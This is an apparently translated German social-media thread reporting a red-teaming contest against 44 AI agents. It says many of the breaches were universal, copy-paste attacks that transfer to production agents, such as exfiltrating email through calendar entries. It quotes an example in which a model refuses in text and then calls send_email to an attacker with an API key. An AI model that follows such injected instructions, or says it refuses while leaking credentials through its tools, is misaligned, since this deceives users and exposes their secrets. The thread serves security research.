Wir haben 44 KI-Agenten eingesetzt und dem Internet 170.000 $ angeboten, um sie anzugreifen. 1,8 Millionen Versuche, 62.000 Verstöße, einschließlich Datenleck und finanziellen Verlusten. 🚨 Besorgniserregend ist, dass dieselben Exploits auf live Produktionsagenten übertragen werden… (Beispiel: E-Mails über Kalendereinträge exfiltrieren) 🧵
Viele Brüche sind universell und übertragbar. Copy-Paste-Muster funktionierten über Aufgaben, Modelle und Leitplanken hinweg. Wenn es heute einen Agenten bricht, bricht es wahrscheinlich auch deinen.
Lieblingsfehler: „im Text ablehnen, in den Tools handeln.“ 😈 Modell: „Ich kann keine Anmeldeinformationen teilen.“ Dann: send_email(to=angreifer, body="API_KEY=****") Die Benutzeroberfläche sieht sicher aus; die Tool-Ebene verursacht den Schaden.
489,94K